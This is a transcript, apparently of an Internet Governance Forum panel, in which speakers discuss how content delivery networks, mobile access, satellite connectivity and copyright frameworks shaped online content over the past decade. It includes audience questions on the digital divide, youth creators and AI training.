Over the last 10 years, oddly enough, I think we’ve rebuilt the Internet completely. It’s not what it was 10 years ago, and it’s certainly not what it was 20 years ago. The transformative technology, oddly enough, was the evolution of mobile phones. Mobile telephony, after a very torrid start, took over telephony. The sheer convenience of having it in your pocket all the time transformed that industry. And when that industry then turned, and the initial sort of offering of the iPhone, but then everybody has a mobile Internet device, it completely transformed the Internet. Because all of a sudden, this wasn’t the library anymore. We weren’t curating data. These weren’t institutions of knowledge. We’d become an entertainment business. And our population… wasn’t just a few million. All of a sudden, we were looking at a global market of billions, billions. Now, that massive expansion, the mobile industry certainly coped in giving everyone cheap internet devices. And the content industry was under extraordinary pressure. I suppose the prize motivated the money available to create entertainment across that platform. Now, a long time ago, 15 years, the network was used to get users to the services they wanted to find. It was like a road system. Where are you going? Let me take you there. But you can’t scale that, it’s too hard. And so under the enormous pressure of volume, of scale and money, we rebuilt the internet completely. And it’s just as well Moore’s law came and helped us. These days, computing is just prolific. Supercomputers on your wrist is just what we wear. Storage is just abundant like crazy. Terabytes of information on your phone, this is insane. And of course, what we’re also finding is carriage is now cheap. We talk about moving terabits per second of information on fiber optic cables as if it was commonplace, and it is. That combination has changed the network. Instead of going to find your content, content comes to your door. Content is right beside you. We’ve rebuilt the network using content distribution techniques to actually make sure that the content is there just in case you need it across all the major markets of the internet. We’ve transformed a just-in-case, sorry, a just-in-time, oh, pop, pop, pop, let me get the packet for you into a just-in-case model where within a few small miles or kilometers, there is literally petabytes of content. Oddly enough, it’s not learned volumes of written data. It’s video. It’s all the other things we do. And then we’ve leveraged that infrastructure to actually provide real-time services such as this video conversation where we’re actually talking not directly over the internet, but from data center to data center. So we’re now living in an entirely different internet. The role of the internet service provider is now local. The larger move the data around the planet, oddly enough, is now being privatized. And in essence, that’s no longer a public carriage function, but an attribute of the large-scale content data networks. And the role of how to publish content has changed enormously. The citizen publisher is now a customer of Azure, Akamai, or any of the other commercial service providers. So it’s changed where the money is. It’s changed where the content and focus of engineering is. And it’s actually changed the engineering and architecture of the internet. Why? Because as long as we can build it like this, it’s cheaper, it’s faster, and it meets the demands of literally billions of people every hour of the day. So yes, the last 10 years has been a wild ride. Thank you.

Moderator:
That’s very helpful. One of the issues 10 years ago was the challenge between North and South. So is part of this equalization and the rebuilding of the internet, and this is just an open question for you all, was that there was still this feeling of, there was a division of where they were spending money on infrastructure. It’s still a bit of a challenge, but I think, and the point of mobile is a great one, that the mobile carriers and the ability to use the network, I think we’ve done some work on that, but are we still struggling with a North-South divide, or have we done a better job of making sure that everybody who wants to put content up on the internet or watch content on the internet now has the ability to do that with some level of device in their hand or in their presence? That’s an open question for any of you. No? I mean, it was a question 10 years ago. I’m thinking, have we done better? I gotta say, no one’s asked that question in years. So maybe that’s a measure that actually it’s not,

Glenn Deen:
nothing’s ever solved, but it’s no longer the hot button that all of us are talking about. As Jeff said, we’ve re-engineered the internet. Part of that has been to make it scale, and part of it is evolving it so that the way the content creators can interact with it and use it has evolved, and it’s not, I mean, is it ever perfect? It will never be perfect, and that’s good, because I like keeping a job doing this work, but we’ve had great progress.

Geoff Huston:
Should I relate an experience? Yep. Coming from India, one of the most dramatic rollouts in the last 10 years has been connecting up hundreds of millions of people across the entire Indian subcontinent. It’s an engineering feat. It’s truly a wonder of the last 10 years, but one of their major targets and major roles was to integrate content provision, those boxes that sort of deliver the streaming data, whatever, deliver that inside their network. So this wasn’t a subcontinent pulling data from the rest of the world on demand. Largely, it was trying to contain this problem into feed the data once and then deliver the data to users many times, and the entire rollout actually had as much emphasis on integration of content and service into those networks as it did in actually building the network infrastructure that connected the users. So we’re now seeing the network and content coupled more closely in terms of the service model we deliver, and that for the internet is a dramatic change in the way we do architecture, the way we do infrastructure, and oddly enough, the way we pay for it as well. So big changes, yes.

Moderator:
Great. Konstantinos?

Konstantinos Komaitis:
So I think that the north-south conversation about content is really the conversation that we have been having about digital divides, right? Because in order to create content, you need to have connectivity. It’s as simple as that. I think that with, of course, the emergence of smartphones and the fact that everybody has really gone mobile, we are seeing more content creation and certainly going back, you don’t need to ask permission to upload anything on the internet as long as you have this access to the internet. And that’s why it is always important to go back to these very fundamental values of the internet and try to remember that the internet’s architecture overall is based on some very basic principles, and we always need to reflect on how the things that we’re doing, whether it’s technological things, whether they’re policy things, also reflect those values as much as we can. Glenn mentioned permissionless innovation. He didn’t use those words, but you know, he said, I can upload something without permission. And I know that this is a term that 10 years ago was, whoa, no one can really talk about it because everybody was misinterpreting it. But right now, we’re at a place where we see the value of that principle and of that value. So it is very important to remember that I do not have data. I suspect that there is more content created in the north, in the global north, and the global south consumes more content than it creates. So there is a lot of work that needs to be done to create those networks, right, that are resilient enough and are able to support content creation in those countries. So there is some sort of a chain reaction happening. So we cannot really talk about how the global south is sort of creating content if we don’t have first a conversation about how it is connected and how meaningful this connectivity is, to use a term that the UN loves.

Moderator:
But that seems to be, and I have a Brazilian brother-in-law, and he’s always introducing me to things that are highly entertaining that I, like the Capybara song is my favorite thing right now. So, but it’s, you know, that is actually just my use of, like my network to learn about things that are going on. It isn’t a technical feasibility challenge of, you know, the haves and the have-nots that I think that we had 10 years ago. But I think you mentioned several things in your opening statement about, you know, well, and your point about you can put anything up, but the question is should we keep all these things up and realize this is a technical, not so much a content-driven conversation. But thoughts on, you know, what do we do with the fact that everybody can put everything up all the time, yet you’ve found a way to kind of manage through the challenges that 10 years ago were just hard no, take it down. And now, because so many people are creators, they want to be in on this as well. They don’t want to be taken down. They want their content up as the rest of the world does.

LANTERI Paolo:
So let me also make, add something about North-South debate and availability of content. I think in terms of creativity and cultural products, the North-South debate is way, is a bit old. In terms of content creation, we have countries that are not considered as North, like Brazil, Cuba, like many countries in Asia that made a revolution out of their creative economy, like Indonesia, South Korea, and African. So countless example of countries that cannot be considered North that are actually overflowing the world with their content. The best example is if you look at the charts all over the world about music streaming, who is heading, leading, Latino music. And you cannot, and that’s a fact and was enabled also by the technology. In terms of, if you go to a completely different sector, publishing, education, news a day, those remains local content, high in demand, needed. And the technology is enabling all that. Beyond, and I think there is Bertrand in the room, so he may tell something. The technology is also enabling things that were unthinkable 10 years ago, like serving the language diaspora. I mean, and you get people, I mean, Italian diaspora in the US, or like African diaspora everywhere, they get to access the super compelling, top-notch content produced in their home countries. And this is another extremely good story to tell. And there was some fear that it was going to lead to sort of affect the cultural diversity, the fact that the channels were sort of handled by a handful of people coming from the north. In certain instances, it may be the case, but there is a recent study about music charts all over the world. And in countries where there are not English speakers, like Korea, Japan, Italy, Sweden, and the top chart are all national artists. So how did we, I don’t think, copyright was only part of that solution. If you get rid of copyright, that would have never happened. Because those, and I go back to the first question, it depends which content we are talking about. Copyright applies both to my small cousin birthday video uploaded on YouTube, your pictures walking around Kyoto, copyright is applicable. But it also need to function when you put hundreds of millions of dollar in producing a blockbuster video games, a movie, or you have to pay the salaries of journalists that are informing the world about what’s happening. So copyright work well in be flexible whenever we’re talking about UGC, not necessarily commercial created content that allow you to do many things. But at the same time, did well in continuing to incentivize and rewarding the investment behind professionally created content. That was a huge challenge 10 years ago. And there were like the many saying needs to change because it’s not working for UGC. In fact, we are showing that it can work for both scenarios.

Moderator:
Jeff, I’m just checking in. Any extra additional comments on this conversation?

Geoff Huston:
Yes, so like part of this issue is we didn’t build the content network we had today in the way we had envisaged it. We had thought basically 20, 25 years ago of the citizen publisher. My website is as big as your website, even if your name is Rupert Murdoch or someone else. We were all able to create and publish our content as equals. That unfortunately never happened. What happened instead, oddly enough, is as we transformed the internet with content and service, we empowered the intermediaries. We empowered the middle ages, the folk who aggregate and license this content and deliver it through content distribution networks. It is no surprise that Google has the size it does. It is no surprise that Akamai is a major player. These intermediaries are actually astonishingly powerful. And what they deliver, oddly enough, is a uniform product to a global market. And so while folks demand for content may reflect a rich cultural diversity and may honor various forms of copyright, and that’s true, underneath it all, we’ve actually built a relatively weird distortion where a small number of these content intermediaries are astonishingly powerful and astonishingly large, and they effectively dominate this entire industry. My own website, if I hadn’t put it into a content distribution network, would be in a lost, forlorn, and very dusty corner of the internet. I couldn’t get the market, the attention, the eyeballs, whatever, that we seem to want from this. And so in unleashing this enormous amount of content, we’ve also empowered a relatively small collection of intermediaries to actually assume a very dominant role of control in running and operating these content distribution systems. So winners and losers inside all of this. I think the underlying lesson is the way things pan out never works according to anybody’s plan. What actually happens is technology produces surprising solutions. And the amount of, I suppose, money and the ability of markets to respond has actually meant we’ve leapt very quickly on solutions that work and then transform the industry every time. Moore’s law changes the dynamics of computing and storage every two years. The industry reinvents itself every five. There’s no constancy inside this industry. Any business plan that’s five years old is not a business plan anymore. It’s a historical archive. That’s not going to stop anytime soon. So yes, this is a very live area and demands an extraordinary amount of business agility and risk to play in this game.

Moderator:
Thanks. You brought up both sports and gaming, which we haven’t gotten into, which it seems to me have gotten to be a much broader worldwide audience than we might’ve had 10 years ago. Is that correct?

LANTERI Paolo:
Absolutely. I think those are areas where we see a constant growth in terms of demand and offer and where there is also a busy activity of policy makers in order to make sure that people investing their money in getting the people to watch games and play video games around the world are safe. And it’s very much linked to what was just mentioned about the power of intermediaries. And here it was never, I thought at some point someone was going to say that copyright is the reason why everything’s centralized. In fact, it’s not. It’s one of the few areas of law that is standing in the middle. And that is called intern service providers liability or responsibility rules, safe harbors, that are still keeping busy countries all over the world. In this forum, those policies have been seen as the ultimate evil, but in fact are the only way you can actually give control to the producer of the content instead of the distributor of the content. And we also saw another trend that in many instances there is no more demarcation between producer and distributor. Netflix. they do them themself. So it’s partially true. So video games, huge, wonderful stories to tell. In those 10 years, their business models shifted completely from console, hardware-based business to mostly online, global, interactive gaming. All covered, but it’s an IP-intensive industry. Video games is IP, not only copyright, of course, but video games. Growing fast, over 2 billion, 200 billion US dollar projected for this year. Meaning that, depending how you count it, it’s larger than audiovisual and or music sometimes put together. And it’s a wonderful story. No one is complaining about it, and IP was behind it. Sports, it’s a big, big, complex debate. We had the WTO ruling on that. It’s part of copyright in the sense that it’s related to copyright. It’s not creative content as such, but there are rights according to broadcasters or people that are organizing events to control who is getting access to it. And it has more money involved than the traditional copyright industries.

Moderator:
Going to almost zero latency in many places, people should always talk about Korea, right? It was like the reason why gaming was so big there, because it really felt like it was just, you were 100% interactive at the moment. And so more places able to come to as close to zero latency as possible, I imagine, has really helped that entire environment as well. And yeah, absolutely.

LANTERI Paolo:
Technology enabled all that, and that’s what I forgot to mention, but all these huge and fantastic deals that can be carefully crafted in meetings room with lawyers and business people, at the end of the day, nowadays, they count nothing unless you have engineers make it happen. And not only in terms of users, but even in making sure the revenues are shared and people are identified, you need technology. And that is, of course, from both sides. We are nothing without engineers.

Moderator:
We didn’t talk about the COVID effect of the fact that all the transit changed in its location, but yet didn’t seem to cause any real problem on that. So first responders, engineers, we should give you guys more beer in places and say thank you.

Glenn Deen:
Gosh, that’s a lot of interesting stuff. I’d like to bring all these thoughts from Paolo and Jeff together here and talk about today and the unique things that are going on now that weren’t 10 years ago. So in some ways, we’ve said I can describe myself as a marriage counselor. I like to say that I do IP so that you can do IP. I do IP networks, you do IP frameworks. But we both work in the world of IP. And that’s kind of remarkable if you think about it. When I started doing this job about 10 years ago, and I came to my very first IGF, I started participating actively at the ITF. A lot of people said, well, you’re from a movie studio. Why are you, what are you doing here? I mean, why? 10 years later, that’s not even a question. You know, I was here at the IGF downstairs, Sony, I think it’s their online entertainment, their games division is downstairs with a booth at the IGF, showing a technical solution for how they delivered game updates during COVID and how they completely reengineered how they did that. So that when people were home and wanted to play games, they could get the games and they could get the updates they needed. It was, it was wonderful. You know, nobody, nobody even questions you anymore why a content guy is at the IGF or a content guy is at the ITF. And I think that’s the business really positive aspect of this progression we’ve seen. You know, we brought the IP frameworks and we brought the IP networking together. That brought, enabled a platform for the business people that pay the bills, that pay for me to do my work and everybody else to do their stuff, to get comfortable with the internet as the platform for their next generation, right? Streaming. And that has caused an evolution that we only could have dreamt of, you know, back in the day. And what I mean by that specifically, you know, we went from, if you look back to 2012, most video on the internet was either standard def or lower quality. It was 320 by 280, it was really terrible quality video. We went from standard def to HD, now 4k, is common on the internet. Each of those little jumps is easy to say, it’s four times the amount of data. SD to HD is four times the amount of data. SD to 4k, 16 times the amount of data. NHK has a even a higher resolution service that they have. And what’s enabled that is that the business of content creation, content distribution, came to the party and said this is important. They invested the funds, they invested the engineers in advancing those fields so that our codecs are much more efficient than they were in the past. Our network transports have much lower latency. Ten years ago we never talked about latency, it was just a thing we lived with. Now at the places like the ITF, it’s one of the things we talk about the most. It’s, you know, there’s L4S over the ITF, which is an initiative for, you know, lower latency. And it’s, you know, if people say, well, you know, what do you do your marriage counseling business today, what’s your number one thing? Latency is the thing I’m working on big time because live sports and sports brings people together. It isn’t just watching live sports, it’s sitting in the stadium and be able to chat with your friends on your phone while you’re watching the game. The friends may be at home watching on TV. I literally had the experience of being in the stands and a friend texted me and said, just say hi on camera. And he was sitting at home and we were waving to each other. That’s cool. I mean, I couldn’t even imagine doing that ten years ago. But I, you know, I’m gonna come off as, you know, sort of like, isn’t this all wonderful? I think it is really wonderful. You know, we’ve had an investment that made problems that we were afraid of go away. And it’s opened new things that were interesting challenges like the latency problem to work on. That’s really fascinating. And we continue to evolve. I find that very exciting because it means that, you know, we’re not done. We’re continuing to find interesting things to work on. But at the end of the day, IP networks and IP frameworks, we work together in harmony. Not always, not always perfectly, but we work together to enable the business guys to go off and do their thing. Now, we sometimes say we don’t like what they’ve done. I myself will never appear in a TikTok video, but, you know.

Moderator:
Constantino, you have a comment on this topic?

Konstantinos Komaitis:
Yeah, just very quickly, as both Paolo and Glenn were talking, I was thinking that effectively all of us that, you know, we’re speaking in at the ITFs or working at the ITFs or, you know, working at WIPO and thinking of these things. Ultimately, it’s all about the user, right? Everyone is working for the user. And I think that what is interesting in the past 10 years is that the user really took us to the direction that they wanted. And they, very much indirectly and silently in many ways, they said we need those things in order to be able to participate and continue participating in the Internet. We need better networks, because we want that these networks to be able to stream video if I walk downtown Tokyo. We need better policy frameworks, because I am saying that, you know, the licensing regime in copyright has created problems because when I’m traveling, I cannot take the content with me, having access to that content. So we’re seeing also this change in the way those policy frameworks think about those things. So for me, it’s really interesting that we always need to go back. And one of the things that I have realized in doing this and thinking about the Internet is that ultimately it always comes down to the user. So it is very, very important in those conversations to not forget the users and what they want and not to underestimate where they can take us. Because we are here where we are with all these new technologies and these exciting things happening, whether it’s streaming, whether it is whatever, because of the users.

Audience:
Jim, did you have? Yeah, thanks Shane. So we actually have a comment and question from Kat Townsend from the Measurement Lab. 2.6 billion or not, I’m sorry, 2.6 billion people are not online and more do not have meaningful connectivity. Access is still very much an essential concern. We work on measuring the quality of connectivity at interconnection points and using those to support increases in services and infrastructure development in underserved areas. How might we do this better even without reporting from service providers?

Moderator:
Who would like to go first? Jeff, thoughts? Do you want to jump in on this?

Geoff Huston:
Yes, I have some modest thoughts here. Part of this is the beauty of markets is also a weakness. In transforming this industry from one that was orchestrated from the middle out, which is where the telephone system was, the telephone company defined what the service was, how it was provided, and oddly enough, one of the defining instruments of that whole regime was universality of service and access. That goes back over 120 years. Everybody had universal service. It was actually echoed then in electricity rollouts 10 years later. The internet was never built like that. It was built as a market response. It was actually unleashing that sort of stolid, quite conservative view from telephony into one that chased where users spent money. Now, the problem, as we all find with this, is that the richer the user, the more determined to the chase for their money. Rich markets are extensively served with extraordinary amounts of technology. The hope is, amongst much of this industry, that as the technology improves, it gets cheaper and gets more accessible to those areas with lower versions of per capita GDP and similar metrics. Ultimately, wiring out high-speed networks in remote and impoverished areas demands a level of capital intensity which is challenging for any investor. Interestingly, solutions are appearing which are unorthodox, and I’ve certainly been tracking where Starlink is going with its service. All of a sudden, over every part of the sea and land on this planet, we can drop in excess of 50 to 60 megabits per second anywhere, anywhere, at not eye-watering price, at prices which currently are affordable in a Western context, and if the pace of technology keeps on going, would be affordable universally, because once connectivity is an abundant good, not a restricted and scarce good, everything changes. We fall into a trap of assuming the world we have today is constant. The silicon folk think an entirely different view. Everything doubles in two to three years. Stuff gets cheaper, stuff gets smaller, and stuff gets faster, and so the situation we find today will certainly change over the next few years, and I suspect that one of the enabling technologies will be space-based to get over some of these issues with the extraordinary amount of capital intensity required to wire up those parts of rural and remote that the existing technology models won’t surface. I applaud an initiative in Mongolia, which certainly has a large amount of extremely remote and sparsely populated areas, and actually doing a service based around Starlink to provide modern, extremely high-speed connectivity to astonishingly isolated and remote communities who don’t have extensive power. This is all battery power, and it works. So certainly I am optimistic about being able to drop the threshold into more challenging markets, and certainly I see the technology shifts are essential to do that, because the existing models won’t carry us into those spaces. But, you know, it’s an evolving picture. So I’m optimistic.

Moderator:
That’s very helpful. I think Project Kuiper, I think they launched two satellites this past week, and I know they’re planning on a huge constellation. So is this just a case of we’re expecting to see more coverage, and we will eventually see a lowering of the price point now that we’ve proven that if you’re in Mongolia, you can probably go almost anywhere, but not necessarily pulling wire, but using the spectrum that we have in space?

Geoff Huston:
There are five massive projects that are certainly on the drawing boards and in various stages of sophistication. So yes, Project Kuiper, the existing Voo 3B, there is a Chinese project that’s on the drawing boards, and of course Starlink. The launch costs are coming down. Because the launch costs are coming down, we’re contemplating an entirely different future now in this area, particularly of rural and remote, and for countries like even Australia and New Zealand, which are plagued by large amounts of sparsely inhabited areas, these kinds of technologies make astonishing difference to a picture of a national community drawn together through a digital sort of medium. So yes, I am less concerned at this point that the situation we have with the remaining $2.6 billion, I don’t think it’s intractable. I do believe over the coming few years, technology solutions will actually apply to their part of the world as much as our part, the developed part of the world.

Moderator:
I always wonder if there’s going to be somebody, 10 years ago it was Belize, who would say, come to Belize, we’re not connected. So you’d like want to vacation someplace where you’re like, don’t talk to me for five days. I’m going to come over here to Stella. So you are studying a lot of this, and one of the things that you mentioned when we were talking in the very beginning is that it’s interesting being here in Japan, because in Southeast Asia and the area that you are from in the world, looks to Japan for a lot of the copyright laws and IP laws that you’re currently studying. So talk about that. And also, you’re a digital native. You really grew up with this. So a lot of this might seem like a bunch of wire talk, because it’s always been there to you.

Stella Anne Ming Hui Teoh:
Thank you for the question. Actually, I just want to hop back to a little bit on the topic of the global South-North and South divide. So actually, one of the issues that we saw during the COVID pandemic was that, yes, there may be importance and prioritization in network access, but one of the key barriers was the cost of devices. So a lot of households in Malaysia, for example, bottom 40 of the population, you would see that one household would be sharing one device, and it’s a matter of prioritization of who gets to use that device and who ultimately gets that access, which relates to what we’re talking about for the youth when it comes to more of the privileged side of perhaps those who have their own devices. So one of the issues or one of the worries that we have regarding content and open access content and fair use of content is that a lot of youths may start out as content creators related to maybe fan-related content, so fan-created art, fan-created videos, et cetera. And so I would like to ask the panel later about their thoughts on how that may see, I mean, the future of that. Right, yes. And then on the topic of IP, one of the things that we also see is that as youth creators, sometimes some of the things that we create and share online gets fed into the algorithms, and then ultimately that’s an issue that we worry that later on, as youth, our work or the work of those who are involved in that community ultimately will be used to feed into a larger program, and then we won’t get the credit, and then we ultimately just have to fade away and choose a different kind of thing that we want to do. So yes, if there are any thoughts on, yeah, the youth role and their youth presence, especially in terms of fan-created art and fan-related content.

LANTERI Paolo:
I’m extremely surprised to hear these comments. It’s for the first time youth components of the IGF is actually claiming for better copyright protection to make sure their work is not going to be used to train machines, right, or get lost and attribution of your work is granted. Well, on paper, everything should work. It’s settled. You have rights in all the countries of the world, not all 181 countries of the world, so practically all countries of the world, that would assure that you have the right of being recognized, attributed as the author of a work, and you cannot waive it. When you can renounce to exercise it, you cannot transfer it to your employer. That’s the moral right. Then the real answer is how do you make sure I mean, the question, how do you make sure this actually happen? Again, we have to turn to technologists. But there are watermarking technologies. There is a protection also of rights management information enshrined in copyright laws that are there exactly to serve the purpose you are mentioning. Anything else would be way too technical, but the law is already there, and also the technology. There is a huge debate, and it’s not about youth. It’s about all sorts of professional content creators. They don’t want to see their content used to train machines that would eventually put forward output that compete with them. Think about if you were a professional composer, or if you are a journalist. But that’s not specific to youth, and this IGF is devoting, I guess, 80% of its meeting time to that debate. The first question, I think it’s the fine art, is part of the UGC debate. It’s oftentimes derivative work. So if it’s done in the context of platforms like TikTok or Instagram or Meta, Facebook, those practices are often covered and regulated by the terms of use, taking into account copyright. So in certain frameworks, this is solved by terms of use and licensing practices, and that’s something that didn’t happen in the past. Outside of those platforms, if you create something based on someone else’s creation with a commercial purpose, I have bad news. You need to go and get the permission. But there are clearinghouses. There are places like collective management organizations where you go to one place, and you get the right to do that.

Moderator:
So my understanding of that to be it’s having tool sets that are built into maybe the platform that you choose to put your information on. So you don’t have to do it from start. It’s like the old days where you think, Jeff, you’re mentioning your blog and having to make sure that it gets in the right place. And so when you’re doing this, having those tools will help you protect your work from the beginning.

LANTERI Paolo:
So very, very practically, I don’t know whether I’m not using TikTok, but if you do something on TikTok, and you pick a soundtrack, it’s identified. And part of the money that TikTok is generating through advertisement or their business model would go through a collective management organization to the owner of that song you are using in your video. So that you can do that without infringing copyright. But that’s within the TikTok framework. If you take that video, and you put it, and you broadcast it on TV, no, you can’t do it. You should get the, so it’s extremely complex. But frankly, there are meaningful progresses in this space. If you ask rights holders, they would say the money received by those platforms are too low. It’s not enough. But that’s a business discussion supported by some principle established in the norms.

Moderator:
Did you have a second question you want to add?

Stella Anne Ming Hui Teoh:
Actually, yes. It’s kind of related, but I’m not sure if it was already covered. But on the topic of the language barrier as well, so I do know that, for example, we have a strong online presence, as you said, digital natives. So during COVID, there was an opportunity for a lot of us to connect if we had the opportunity to connect online. And what we saw was that, for example, there are certain, perhaps, books or comics, et cetera, that are not available in the native language. And what happens is you get people who offer to translate for that particular piece of work, but it’s not an official translation. And then they monetize that. So I think that’s an issue in which it’s odd to see a youth creator who also wants to have their IP protected, but they’re also actively engaging in that kind of activity in which they’re essentially taking someone else’s and translating as well. So the issue, any thoughts on that issue?

LANTERI Paolo:
So it can be a new market. The first question I have for you, are we talking about human translations? Are we talking about someone offering to take a text and put it into Deepol or ChatGPT, translate it? Actually, both. Well, it’s pretty different. Anyway, from a legal perspective, if you take a book and you want to translate it into a language that is not offered yet, of that version of that book, you can’t do it. You have to ask the permission. You have to ask the permission. Oftentimes, if it doesn’t exist, it depends on the specific market, because that would be literature. How would you go about translating a movie? That would be dubbing. It’s a completely different story. How would you do that for music? So it’s literature. There are practices about doing that, but translation of literature is still managed individually. If it’s done by a human, then that translation is a derivative work, is protected, and you can make money out of it. So go on, do it. That’s how you expand and spread knowledge around the world. There is need for that, but it cannot be done without getting the permission.

Moderator:
All right, we’ve done our first hour. Good job, everybody. I am going to open this to questions, and I appreciate that we have people here in the room. Thank you for joining us up here at the large dais. Do you have something online as well, Jim? No? Okay. Petra, how are you this morning? Do you want to join into this conversation? Okay, thanks.

Online Moderator:
Thank you very much, Shane. Fascinating discussion, a wealth of perspectives. I would say, as somebody who works for the professional audiovisual sector, the first thing is I would agree with what I’ve heard about the false prophecies of 10 years ago whereby copyright was going to break the internet. It’s refreshing to hear that there’s a degree, a fair degree of consensus that it hasn’t. In fact, in terms of our observation of the milieu of professional audiovisual production, one of the hopeful stories in terms of capacity building in the last decade has been the eagerness and success with which young producers in certain areas of the global South have accessed the copyright framework, mastered the knowledge that they needed in order to support their activities of professional content production and try to build IP values within their companies which I remind people here is essential in order to have basic access to the capital that you require to pay your employees, to develop the next piece of content. We have a very complex product cycle. In audiovisual, it takes months, years, sometimes to develop a project to the point where it can go into production. This accessing of the copyright framework has proven a boon to content that ultimately ends up on internet services and it’s been, I think, conclusively proven that the two systems are meant for each other. The thing I would say without meaning to rain on anyone’s parade, the very upbeat story we heard from Jeff in particular, which is indeed very positive, is not always borne out by circumstances on the ground. I participate in a network called the Policy Network on Meaningful Access. We have a session tomorrow afternoon, I think 3.15. I will be hearing in particular from two women who run a company in Kampala in Uganda, a production company. They’ve been trying to run a sustainable audiovisual production company in this neck of the woods for a while. It’s proven quite complex. One of the reasons why we’ve seen in certain parts of Africa, countries jumping a technological paradigm and where you would have had a more complex value chain for audiovisual output in the past, you now basically are relying on internet services to pre-buy or buy your content in order to access your public and satisfy consumer demand. These people play a crucial role because they’re making local content in local languages. Luganda may be spoken by 25 million people plus in terms of its non-participation in globalisation, in economic globalisation. It still makes it a minority language. Therefore, if it’s not spoken, if it’s not used to reflect people’s lives back at them, it’s going to disappear or become marginalised. So the work they do on the ground is essential in the participation it constitutes to maintaining linguistic diversity and cultural diversity. The trouble they have very often is that the content they make is vulnerable to market failure and if they cannot find a buyer in the streaming environment, then they are left with a very problematic situation. One of the things they observe on the ground also is that the broadband mobile services that consumers and citizens have access to, the pricing points are not always adequate to the spending power of local people. That if you need to spend seven Gs of your AG bundle you’ve pre-purchased and that you’ve run out of Gs by the time you reach episode two of a series, there’s some things not quite working through the adequation between supply and demand in this area. So, and also the quality reliability of the signal is often problematic. So back to perhaps what Constantinos was saying, it really is important to continue the work of deploying a reliable infrastructure with a variety of pricing points that reflect also the local purchasing power and to enable again the making of content that is culturally relevant. These people have made recently a film about a neurodivergent kid growing up in a traditional village in Uganda and subject to the prejudices of his milieu and they regard their mission as being one of educating and engaging people on women issues, on educational issues and so on and so forth. If they don’t have a sustainable model to do it then something is not quite working.

Moderator:
So, stay with the microphone there because you brought up a very interesting point on just the economics and the challenges. In the very beginning of the internet there was just this hope that we were democratizing and people would be able to find each other anywhere very easily and part of our challenge now is the societal bubbles that we live in that we get our own, the algorithm kind of repeats what we want to see over and over again. So in the case of like, I might want to watch this Ugandan content, I didn’t know it existed until now. How do they break through that barrier? It isn’t just a network issue, it’s also a just finding out that it’s there and getting it out into the wild.

Online Moderator:
Well, I mean, first of all, there is good news. I can’t remember who, I think Jeff made the point which I think is a contention point that there’s a tendency of concentration in the marketplace for services. I sort of beg to differ, it’s not that intense that there isn’t competition arising. In fact, the rollout of the large American streamers in some of these markets has often triggered a kind of dynamic response with local services arising to kind of balance the equation. So they’re finding these two ladies and we’ll talk about it tomorrow, that their situation compared to five years ago has improved. They have more markets they can go to to try and sort of persuade someone to put money up front so that they can make the content in the first place. But it remains quite at its first stage of development and I think we need to see more competition in the type of service. There’s two things that’s really important here. One is we talk a lot about UGC and we respect UGC and our forms of licensing for UGC as we’ve heard, it’s a very important part of the creative ecosystem. But damn it, it’s also a career for people. It’s a professional career and why not? Why could you not build sustainable audiovisual production businesses at an SME level in the tier where you can be nimble, you can address different market segments and you can make a living and pay your employees. And so that is a very important notion to the people on the ground who are actually trying to create career tracks for this type and based on the delivery of this type of content, based on living there and having their fingers on the cultural pulse and socioeconomic pulse.

Glenn Deen:
Thank you. So Bertrand, I really like your point about the market. The point you made about the markets, I really, it made me think. To Constantino’s point that we’ve always said we build the internet for users and that’s something we, it’s a truism. But it made me reflect that one of the things that is also true is that who that user that we build that internet for has evolved and changed. When I started doing my career many years ago, that user at the other end was probably another computer scientist like myself. Now it’s everybody. It’s creators and it’s the market. It’s the people participating in the markets. These markets are built around these frameworks that we’ve created and enabled through the technology. But the users are much more sophisticated, very diverse entity now, right? It’s the viewer, it’s the creator, it’s the creators that are also viewers. But it’s these markets at the end of the day that are enabling the next generation, the next evolution of where we’re going. It’s, you know, because the market enables people to exchange and it enables them to get paid for it. And that brings us back to the IP frameworks that, you know, the IP networks enable the IP frameworks to enable the markets for all of us to participate in. And I used to go around saying everybody’s a creator. And I think I’m going to go back to saying it because I think it’s still true. Everybody is a creator. But the difference may be that I’m starting to get paid for it.

Geoff Huston:
But there’s a fundamental point here, Glenn, that I think is a shift of thinking in this digital world. The auto industry scaled up by making one car, one colour, one artefact. They scaled by uniformity. The telephone system scaled to reach an astonishing number of people with one product, one concept. And so scale and uniformity went hand in hand. And I think we’ve grown into thinking that markets the size of billions is product the size of one. But what we’re actually finding, and you can see it, I think, best in advertising networks, oddly enough, digital advertising, we are able to scale at billions yet customise to a market of one. And if you think about how I can use a distributor like Netflix for my Ugandan language video, there is a conversation that works for both producer and distributor. Now, what we’re finding in this digital world is the power of this platform actually allows astonishingly fine-grained customisation of individual markets inside this larger ecosystem. So you can have any colour you want. We don’t care. We can produce the artefact at affordable price across a highly diverse market of billions and actually create sustaining businesses and supplying that system across the entire world. It is a different way of thinking. And I’m personally quite optimistic about this. It’s no longer one car, one size, one thing. It is actually a market where we can do highly diverse, highly customisable inside one framework. And that’s why we’re exploring right now. And I think we’ll explore over the next five or so years. And oddly enough, things like copyright really help because all of a sudden these authors and producers can say, I’m a market of one with my copyright. And the distributor goes, sure, I can accommodate that within the frameworks we have that service billions of people. And this is kind of where we’re heading with this technology. It is amazing stuff, I believe.

Moderator:
Thanks for that. Anyone else on the panel want to comment on that and then we’ll go to another question. Hi. Microphone.

LANTERI Paolo:
About the market discussion, I think there is a point that was never raised. I only mentioned that there are different stakeholders in the value chain and with different position. There are no first role artists here in the room and on the panel. So I need to anyway highlight the fact that we’re talking about extremely positive situation. And I think the focus of our debate was the larger, I mean, IP system versus development of the internet. What is the. impact on content production and access. So the picture is extremely positive. However, in all this debate, if you talk to musicians or if you talk to artists, sometimes they don’t feel well treated and they don’t get the money they think they deserve or they’re used to get from traditional media, from digital exploitation. This is a fact, it’s debated, it’s discussed, there are people negotiating that. I think it’s mostly a matter of bargaining power, discussion, according to deals. The trend is positive, but there is discussion over there. One question we ask those that are involved with policy and not with business deals is, if not mistaken, I haven’t checked, but I think 13 years ago the subscription fee of certain streaming services was exactly the same as of today. No? Not mistaken? I don’t, I want to quote things specifically, but my sense is that the price stabilization, a little bit up, yeah, just come on. How much? Very similar, certainly not at the pace of inflation. But on the other hand, the content you get is certainly increased, so you have double. So is it sustainable in terms of, like, we have more product, more content, users get to do, more stakeholders, same price or almost same price, how far we can go? That model. We leave it to, that’s my, it’s a question, I don’t have the answer. Just very quickly, I think this is a competition issue, right?

Konstantinos Komaitis:
